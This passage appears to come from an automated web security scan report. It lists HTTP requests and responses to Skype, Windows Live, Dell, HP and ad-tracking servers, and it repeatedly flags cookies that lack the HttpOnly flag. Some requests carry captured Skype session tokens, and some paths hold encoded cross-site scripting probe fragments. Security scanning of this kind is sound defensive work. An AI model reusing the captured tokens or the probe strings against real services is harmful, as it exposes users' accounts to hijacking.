Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/newscolumns_businessstory;u=**300x250,336x280,300x600,336x850******223,234,220,231,233,227**;page=article;msrc=googlenews_wsj;p39=223;p39=234;p39=220;p39=231;p39=233;p39=227;;mc=google_fullfree;tile=5;sz=300x250,336x280,300x600,336x850;ord=9507950795079507;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:17:44 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 90379962_reset=1315153064;path=/
Expires: Sat, 03 Sep 2011 22:17:44 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /eas?camp=65585;cu=21949;cre=mu;js=y;target=_blank;ord=[timestamp];EASClick= HTTP/1.1
Host: eas.apm.emediate.eu
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://lwn.net/Articles/456878/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bb/mrcsrc/getpixel.php?db=1241&ai=1234&si=4321&z=1315187696 HTTP/1.1
Host: gacela.eu
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://lwn.net/Articles/456878/
The following cookie was issued by the application and does not have the HttpOnly flag set:
lang=en-us; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /subchoice/country/us/en/subhub.aspx HTTP/1.1
Host: h30046.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: h30434.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /account/signup-form?setlang=en&intsrc=client%7Creg-a%7C0%2F5.5.0.114 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=hvd1f0nqsu93kvs6dhba2diop2; skype-session-token=94fd441852b9e1046c98536f973599d688791fc3
Host: login.skype.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/shop HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/shop.accessories.headsets HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/shop.accessories.phones HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/shop.accessories.webcams HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/shop.extras HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/skype.manager.setup HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/tvwebcams HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK
Connection: close
Date: Mon, 05 Sep 2011 02:23:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtMzgyODQzNDI0LjMwMTczMDU2AAAAAAAAAAAJAAAACgAAALWLYU61i2FOdQAAAHaPYU54iWFO8gEAAJeLYU6LiWFOFQAAAM7CYE6OwmBOKwIAAKYvYU6YL2FOGwEAAKGUYU5wi2FODQAAAI8yZE6PMmRO/QEAAJqSYU6ZkmFOmwEAACSUYU7uk2FOBQAAABMAAACakmFOi4lhTkQAAAB2j2FOeIlhTiAAAADOwmBOjsJgThUAAACPMmROjzJkTpgAAAAklGFO7pNhTgAAAAA-; path=/; expires=Thu, 02-Sep-2021 02:23:11 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
lc=en-US; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /si/login.aspx/x22 HTTP/1.1
Host: mid.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 2491
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: lc=en-US; path=/
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 04 Sep 2011 21:48:27 GMT
Connection: close
<html> <head> <title>Windows Live ID</title> <meta name="MobileOptimized" content="100"/> <link type="text/css" rel="stylesheet" href="/hig.css"/> </head> <body> <form id="EmailPasswordForm" na ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
lc=en-US; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /si/login.aspx/x3c/cite/x3e/x3cspan HTTP/1.1
Host: mid.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 2560
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: lc=en-US; path=/
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 04 Sep 2011 21:48:29 GMT
Connection: close
<html> <head> <title>Windows Live ID</title> <meta name="MobileOptimized" content="100"/> <link type="text/css" rel="stylesheet" href="/hig.css"/> </head> <body> <form id="EmailPasswordForm" na ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK
Cache-Control: private
Cteonnt-Length: 422187
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: TocHashCookie=ms310241(n)/aa155073(n)/aa902560(n)/aa342502(VS.85,n)/aa342504(VS.85,n)/na/; expires=Thu, 05-Sep-2041 02:23:09 GMT; path=/
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 02:23:09 GMT
Content-Length: 422187
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 21:13:41 GMT
P3P: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: 33x_ps=u%3D8939182109%3As1%3D1314119008217%3Ats%3D1314119008217; Domain=.33across.com; Expires=Mon, 03-Sep-2012 21:13:41 GMT; Path=/
Location: http://ib.adnxs.com/mapuid?t=2&member=1001&user=8939182109&seg=150349&seg_code=33x&redir=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Ft%3D2%26id%3D1211914&random=918826
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /www/delivery/ajs.php?zoneid=26&target=_blank&cb=51874693474&charset=ISO-8859-1&loc=http%3A//lwn.net/Articles/456878/%23A&referer=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: rotation.linuxnewmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://lwn.net/Articles/456878/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK
Cache-Control: private,max-age=0
Date: Sun, 04 Sep 2011 16:20:00 GMT
Content-Type: text/html; charset=utf-8
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=7
P3P: policyref="http://www.dell.com/w3c/p3p.xml", CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: search_bn=us|bsd|SearchBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:20:00 GMT; path=/
Vary: Accept-Encoding
Content-Length: 68855
// menu definition for c=us&l=en&s=bsd&cs=04 // var m_0_0_Menu = new Array( new menuItem( "Laptops", "http://www.dell.com/p/vostro-laptop-deals.aspx?c=us&cs=04&l=en&s=bsd" ), new menuItem( "Desktops ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
HTTP/1.1 200 OK
Cache-Control: private,max-age=0
Date: Sun, 04 Sep 2011 16:19:59 GMT
Content-Type: text/html; charset=utf-8
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=7
P3P: policyref="http://www.dell.com/w3c/p3p.xml", CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: search_bn=us|bsd|SearchBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:19:56 GMT; path=/
Set-Cookie: dellsearch=srchb=control&rpp=12; expires=Tue, 04-Oct-2011 16:19:56 GMT; path=/
Set-Cookie: StormSCookie=bandwidth=NA; domain=.dell.com; path=/
Vary: Accept-Encoding
Content-Length: 90930
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>xss - ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /login HTTP/1.1
Host: secure.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/image/serverpage/avatar-name/bike/avatar-theme/candy/avatar-collection/transit/avatar-display-size/message HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24028/highlight/true
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: skypec.i.lithium.com
Proxy-Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/image/serverpage/avatar-name/camera/avatar-theme/candy/avatar-collection/tech/avatar-display-size/message HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://community.skype.com/t5/English/ct-p/English?profile.language=en
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: skypec.i.lithium.com
Proxy-Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/image/serverpage/avatar-name/dog/avatar-theme/candy/avatar-collection/animals/avatar-display-size/message HTTP/1.1
Host: skypec.i.lithium.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/image/serverpage/avatar-name/maracas/avatar-theme/candy/avatar-collection/music/avatar-display-size/message HTTP/1.1
Host: skypec.i.lithium.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/image/serverpage/avatar-name/pyramids/avatar-theme/candy/avatar-collection/architecture/avatar-display-size/message HTTP/1.1
Host: skypec.i.lithium.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/image/serverpage/avatar-name/trumpet/avatar-theme/candy/avatar-collection/music/avatar-display-size/message HTTP/1.1
Host: skypec.i.lithium.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/image/serverpage/avatar-name/video/avatar-theme/candy/avatar-collection/tech/avatar-display-size/message HTTP/1.1
Host: skypec.i.lithium.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://community.skype.com/t5/English/ct-p/English?profile.language=en
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: skypec.i.lithium.com
Proxy-Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/scripts/3400302BF95FC3FDC82E2238CD4B03BF/lia-scripts-body-min.js HTTP/1.1
Host: skypec.i.lithium.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/scripts/6141DE8643E58E1BA36A2E83A753DBF6/lia-scripts-body-min.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://community.skype.com/t5/help/faqpage/faq-category-id/posting
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: skypec.i.lithium.com
Proxy-Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24028/highlight/true
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: skypec.i.lithium.com
Proxy-Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/scripts/A07927DB54138E290B0015853D34D7F4/lia-scripts-body-min.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://community.skype.com/t5/forums/searchpage/tab/message?filter=location&location=Category%3AEnglish&q=xss
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: skypec.i.lithium.com
Proxy-Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://community.skype.com/t5/forums/searchpage/tab/message?filter=location&location=Category%3AEnglish&q=xss
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: skypec.i.lithium.com
Proxy-Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 16:19:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAAJAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAAMvKYk7NyWJOF7MAAPekY07WpGNOBQAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAADLymJOzcliTvBFAAD3pGNO1qRjTgAAAAA-; path=/; expires=Wed, 01-Sep-2021 16:19:03 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rd?cid=901pdb6671&mid=901qz26673&mkwid=s1CStlI5S&pcrid=13885348293&pkw=application%20security%20web&pmt=b&lp=http://altfarm.mediaplex.com/ad/ck/12309-80794-34740-0?kw=application%20security%20web&mpre=http%3A%2F%2Flt%2Edell%2Ecom%2Flt%2Flt%2Easpx%3FCID%3D64824%26LID%3D1652027%26DGC%3DST%26DGSeg%3DBSD%26DURL%3Dhttp%253A%252F%252Fcontent%252Edell%252Ecom%252Fus%252Fen%252Fbusiness%252Fsecurity%252Dnetwork%252Easpx%3Fst%3Dapplication%20security%20web%26ACD%3Ds1CStlI5S,13885348293,901qz26673 HTTP/1.1
Host: tracker.marinsm.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /track.php?ie=1&a1017=&b1017=&a1017exit=&a=1017&u=http%3A%2F%2Fwww.radware.com%2F&r=&t=1315153232081 HTTP/1.1
Host: trk.etrigue.com
Proxy-Connection: keep-alive
Referer: http://www.radware.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ui/0/5.5.0.114./en/help HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: ui.skype.com
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824
Response
HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 21:03:33 GMT
Server: Apache
Cache-control: no-cache, must revalidate
Pragma: no-cache
Expires: 0
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170213:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-12 21:03:33 GMT; path=/; domain=.skype.com;
Location: https://support.skype.com/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ui/0/5.5.0.114./en/upgrade HTTP/1.1
User-Agent: Skype Upgrade
Host: ui.skype.com
Response
HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 21:04:44 GMT
Server: Apache
Cache-control: no-cache, must revalidate
Pragma: no-cache
Expires: 0
Set-Cookie: SC=CC=:CCY=:LC=en-us:TM=1315170284:TS=1315170284:TZ=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-12 21:04:44 GMT; path=/; domain=.skype.com;
Location: http://download.skype.com/SkypeSetupFull.exe
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ui/0/5.5.0.114./en/upgraded HTTP/1.1
User-Agent: Skype. 5.5
Host: ui.skype.com
Pragma: no-cache
Response
HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 17:58:15 GMT
Server: Apache
Cache-control: no-cache, must revalidate
Pragma: no-cache
Expires: 0
Set-Cookie: SC=CC=:CCY=:LC=en-us:TM=1315159095:TS=1315159095:TZ=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-12 17:58:15 GMT; path=/; domain=.skype.com;
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ui/0/5.5.0.115./en/go/apps HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: ui.skype.com
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824
Response
HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 21:08:54 GMT
Server: Apache
Cache-control: no-cache, must revalidate
Pragma: no-cache
Expires: 0
